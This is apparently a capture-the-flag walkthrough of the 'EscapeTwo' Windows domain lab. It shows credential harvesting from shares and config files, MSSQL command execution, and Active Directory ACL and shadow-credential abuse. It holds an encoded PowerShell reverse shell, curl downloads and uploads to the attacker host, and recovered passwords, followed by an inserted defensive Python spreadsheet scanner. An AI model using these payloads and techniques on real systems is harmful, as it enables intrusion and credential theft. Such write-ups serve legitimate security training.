EscapeTwo
Recon
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
Creds:
rose:KxEPkKe6R8su
SMB (139/445)
└─$ netexec smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.51 445 DC01 [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.51 445 DC01 [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.51 445 DC01 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.51 445 DC01 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.51 445 DC01 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.51 445 DC01 [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.51 445 DC01 [*] Enumerated shares
SMB 10.10.11.51 445 DC01 Share Permissions Remark
SMB 10.10.11.51 445 DC01 ----- ----------- ------
SMB 10.10.11.51 445 DC01 Accounting Department READ
SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.51 445 DC01 C$ Default share
SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.51 445 DC01 Users READ
SPIDER_PLUS 10.10.11.51 445 DC01 [-] Failed to download file "Default/NTUSER.DAT.LOG2". Error: 'RemoteFile' object has no attribute 'get_filesize'
SPIDER_PLUS 10.10.11.51 445 DC01 [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json".
SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Shares: 7 (Accounting Department, ADMIN$, C$, IPC$, NETLOGON, SYSVOL, Users)
SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Readable Shares: 5 (Accounting Department, IPC$, NETLOGON, SYSVOL, Users)
SPIDER_PLUS 10.10.11.51 445 DC01 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Total folders found: 76
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Total files found: 67
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Files filtered: 6
SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size average: 23.74 KB
SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size min: 0 B
SPIDER_PLUS 10.10.11.51 445 DC01 [*] File size max: 512 KB
SPIDER_PLUS 10.10.11.51 445 DC01 [*] File unique exts: 15 (.xlsx, .cmtx, .blf, .inf, .zfsendtotarget, .desklink, .mapimail, .pol, .log2, .log1...)
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Downloads successful: 60
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Downloads failed: 1
└─$ mv /tmp/nxc_hosted/nxc_spider_plus/10.10.11.51/ .
└─$ find . -type f | grep -ivE '(ini|lnk)$'
./Users/Default/NTUSER.DAT.LOG2
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop (create shortcut).DeskLink
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Mail Recipient.MAPIMail
./Users/Default/AppData/Roaming/Microsoft/Windows/SendTo/Compressed (zipped) Folder.ZFSendToTarget
./Accounting Department/accounts.xlsx
./Accounting Department/accounting_2024.xlsx
./SYSVOL/sequel.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/comment.cmtx
./SYSVOL/sequel.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
For some reason the .xlsx files wouldn't open in a spreadsheet viewer. An .xlsx is just a zip archive of XML parts, so unzip them and read the contents manually.
└─$ unzip accounting_2024.xlsx -d accounting_2024
└─$ unzip accounts.xlsx -d accounts
Searching the extracted XML for the domain name gives many hits, and there look to be passwords in there too!

Table from the spreadsheet (values not reproduced in this copy): First Name | Last Name | Username | Password
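To make the "unzip and read it manually" step concrete, here is an added example (my code, not the writeup's) that parses the two XML parts that matter inside an .xlsx, xl/sharedStrings.xml and xl/worksheets/sheet*.xml, and flags rows that fill in a password-like column. The spreadsheet it reads is a constructed in-memory sample with fake values; the column-name keywords and the sample content are assumptions. A blue team can point the same routine at a share crawl (the spider_plus download folder above) to find spreadsheets that store account passwords.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# SpreadsheetML namespace used by sharedStrings.xml and the worksheet parts.
NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"


def build_sample_xlsx() -> bytes:
    """Constructed sample: a minimal .xlsx built in memory (not the box's file).

    An .xlsx is a zip of XML parts. Text cells carry t="s" plus an index into
    xl/sharedStrings.xml, which is why grepping the unzipped tree for a domain
    name lands you in sharedStrings.xml rather than in the sheet itself.
    """
    header = ["First Name", "Last Name", "Username", "Password"]
    rows = [["Example", "User", "EXAMPLE\\euser", "Fake-Passw0rd"],
            ["Second", "Person", "EXAMPLE\\sperson", "AnotherFakeOne!"]]
    strings = [s for row in [header, *rows] for s in row]
    sst = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
           + "".join(f"<si><t>{escape(s)}</t></si>" for s in strings) + "</sst>")
    cells, idx = [], 0
    for r, row in enumerate([header, *rows], start=1):
        cells.append(f'<row r="{r}">')
        for c in range(len(row)):            # columns A.. (sample has fewer than 26)
            col = chr(ord("A") + c)
            cells.append(f'<c r="{col}{r}" t="s"><v>{idx}</v></c>')
            idx += 1
        cells.append("</row>")
    sheet = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
             '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
             "<sheetData>" + "".join(cells) + "</sheetData></worksheet>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/sharedStrings.xml", sst)
        z.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


def read_xlsx_rows(data: bytes) -> list[list[str]]:
    """Return every row of every worksheet as a list of cell strings, resolving
    shared-string and inline-string cells; numeric cells come back as text."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        shared = []
        if "xl/sharedStrings.xml" in names:
            root = ET.fromstring(z.read("xl/sharedStrings.xml"))
            # an <si> holds one <t>, or several <r><t> runs for rich text
            shared = ["".join(t.text or "" for t in si.iter(NS + "t"))
                      for si in root.iter(NS + "si")]
        rows = []
        for name in sorted(n for n in names if n.startswith("xl/worksheets/sheet")):
            for row in ET.fromstring(z.read(name)).iter(NS + "row"):
                cells = []
                for c in row.iter(NS + "c"):
                    v = c.find(NS + "v")
                    if c.get("t") == "s" and v is not None:
                        cells.append(shared[int(v.text)])
                    elif c.get("t") == "inlineStr":
                        cells.append("".join(t.text or "" for t in c.iter(NS + "t")))
                    else:
                        cells.append("" if v is None else (v.text or ""))
                rows.append(cells)
    return rows


def find_credential_rows(rows: list[list[str]]) -> list[list[str]]:
    """Rows whose header names a password-like column and which fill it in.
    Keyword list is an assumption; extend it for the naming used in your org."""
    if not rows:
        return []
    header = [h.lower() for h in rows[0]]
    secret_cols = [i for i, h in enumerate(header)
                   if any(k in h for k in ("password", "passwd", "pwd", "secret"))]
    return [r for r in rows[1:] if any(i < len(r) and r[i] for i in secret_cols)]


if __name__ == "__main__":
    found = find_credential_rows(read_xlsx_rows(build_sample_xlsx()))
    for r in found:
        print("credential row:", r[:3], "(password present)")
```

Replace `build_sample_xlsx()` with `open(path, "rb").read()` over each downloaded .xlsx to sweep a share; only the header and username columns are worth logging, never the password cell itself.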
MSSQL (1433)
With the sa credentials we get command execution on the MSSQL server; whoami returns the service account sequel\sql_svc.
└─$ netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x whoami
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
MSSQL 10.10.11.51 1433 DC01 [+] Executed command via mssqlexec
MSSQL 10.10.11.51 1433 DC01 sequel\sql_svc
└─$ netexec mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA3ACIALAA0ADQANAA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
[14:42:23] ERROR Error when attempting to execute command via xp_cmdshell: timed out
---
└─$ listen 4445
Ncat: Connection from 10.10.11.51:50320.
PS C:\Windows\system32> whoami /all
User Name SID
============== ============================================
sequel\sql_svc S-1-5-21-548670397-972687484-3496335370-1122
Group Name Type SID Attributes
========================================== ================ =============================================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
SEQUEL\SQLServer2005SQLBrowserUser$DC01 Alias S-1-5-21-548670397-972687484-3496335370-1128 Mandatory group, Enabled by default, Enabled group, Local Group
SEQUEL\SQLRUserGroupSQLEXPRESS Alias S-1-5-21-548670397-972687484-3496335370-1129 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Reverse Shell
PS C:\Users\sql_svc\Music> curl.exe --version
curl 8.9.1 (Windows) libcurl/8.9.1 Schannel zlib/1.3 WinIDN
Release-Date: 2024-07-31
Protocols: dict file ftp ftps http https imap imaps ipfs ipns mqtt pop3 pop3s smb smbs smtp smtps telnet tftp
Features: alt-svc AsynchDNS HSTS HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM SPNEGO SSL SSPI threadsafe Unicode UnixSockets
PS C:\Users\sql_svc\Music> curl.exe 10.10.14.47/wp.exe -O
PS C:\Users\sql_svc\Music> .\wp.exe | tee -filepath wp.log
...
------------ Checking KrbRelayUp
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (SEQUEL) so it could be vulnerable.
- You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
------------ Logged users
NT SERVICE\MSSQLFDLauncher$SQLEXPRESS
NT SERVICE\SQLTELEMETRY$SQLEXPRESS
SEQUEL\Administrator
SEQUEL\sql_svc
SEQUEL\ryan
...
------------ Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Service [WriteData/CreateFiles]
C:\Users\ryan
C:\Users\sql_svc : sql_svc [AllAccess]
...
------------ Modifiable Services
- Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
ConsentUxUserSvc_581e8: GenericExecute (Start/Stop)
DevicePickerUserSvc_581e8: GenericExecute (Start/Stop)
serSvc_581e8: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_581e8: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_581e8: GenericExecute (Start/Stop)
UnistoreSvc_581e8: GenericExecute (Start/Stop)
UserDataSvc_581e8: GenericExecute (Start/Stop)
WpnUserService_581e8: GenericExecute (Start/Stop)
...
Upload SharpHound and collect data about AD
└─$ updog
[+] Serving /home/woyag/Desktop/Rooms/EscapeTwo...
---
PS C:\Users\sql_svc\Music> .\sh.exe -c all --zipfilename sh.zip
PS C:\Users\sql_svc\Music> curl.exe -v 10.10.14.97:9090/upload -F 'file=@20250111115528_sh.zip' -F 'path=/home/woyag/Desktop/Rooms/EscapeTwo'

The BloodHound "Shortest Path to Domain Admins" query (graph not reproduced here) shows ryan, who seems to be our next target for priv esc.
Privilege Escalation (ryan)
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
└─$ evil-winrm -i sequal.htb -u ryan -p WqSZAF6CysDQbGb3
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
User Name SID
=========== ============================================
sequel\ryan S-1-5-21-548670397-972687484-3496335370-1114
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SEQUEL\Management Department Group S-1-5-21-548670397-972687484-3496335370-1602 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
User.txt
*Evil-WinRM* PS C:\Users\ryan> cat Desktop/user.txt
f5f6936ee23db461dbb4eeb02342dabb
Privilege Escalation (ca_svc)

(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
[2025-01-11 16:13:22] [Set-DomainObjectOwner] Changing current owner S-1-5-21-548670397-972687484-3496335370-512 to S-1-5-21-548670397-972687484-3496335370-1114
[2025-01-11 16:13:22] [Set-DomainObjectOwner] Success! modified owner for CN=Certification Authority,CN=Users,DC=sequel,DC=htb
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Add-DomainObjectAcl -PrincipalIdentity ryan -TargetIdentity ca_svc -Rights fullcontrol
[2025-01-11 16:13:22] [Add-DomainObjectACL] Found target identity: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[2025-01-11 16:13:22] [Add-DomainObjectACL] Found principal identity: CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
[2025-01-11 16:13:22] Adding FullControl to S-1-5-21-548670397-972687484-3496335370-1607
[2025-01-11 16:13:23] DACL modified successfully!
(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Set-DomainUserPassword -Identity ca_svc -AccountPassword 'Password123$'
[2025-01-11 16:13:23] [Set-DomainUserPassword] Principal CN=Certification Authority,CN=Users,DC=sequel,DC=htb found in domain
[2025-01-11 16:13:23] [Set-DomainUserPassword] Password has been successfully changed for user ca_svc
[2025-01-11 16:13:23] Password changed for ca_svc
Note: something like a scheduled cleanup job seems to run every ten seconds or so; if the second command fails, run the first again and then retry the second.
Alternatively, bloodyAD can do the same owner / GenericAll / password-reset steps:
bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set owner ca_svc ryan
bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" add genericAll ca_svc ryan
# bloodyAD --host "10.129.128.217" -d "sequal.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set password "ca_svc" 'Password123$'
Docs: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide
The password reset didn't work as intended, and the shadow credentials attack also failed with an error about Kerberos not working.
Because Kerberos didn't seem to work from outside the box, we can try the attack from inside with the Whisker and Rubeus binaries: https://github.com/jakobfriedl/precompiled-binaries
└─$ curl -LOs https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Whisker.exe
└─$ curl -LOs https://github.com/jakobfriedl/precompiled-binaries/raw/main/LateralMovement/Rubeus.exe
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl.exe 10.10.14.97/Whisker.exe -O
*Evil-WinRM* PS C:\Users\ryan\Music> curl.exe 10.10.14.97/Rubeus.exe -O
*Evil-WinRM* PS C:\Users\ryan\Music> .\Whisker.exe add /target:ca_svc
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password JSVbHTvuGtaRz03f
[*] Searching for the target account
[*] Target user found: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 44ed67c4-b31e-4db2-91c8-4d37c1e70bce
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:ca_svc /certificate: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 /password:"JSVbHTvuGtaRz03f" /domain:sequel.htb /dc:DC01.sequel.htb /getcredentials /show
*Evil-WinRM* PS C:\Users\ryan\Music> .\Rubeus.exe asktgt /user:ca_svc /certificate:<base64 certificate blob printed by Whisker above> /password:"JSVbHTvuGtaRz03f" /domain:sequel.htb /dc:DC01.sequel.htb /getcredentials /show
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=ca_svc
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\ca_svc'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQjCCBj6gAwIBBaEDAgEWooIFXzCCBVthggVXMIIFU6ADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
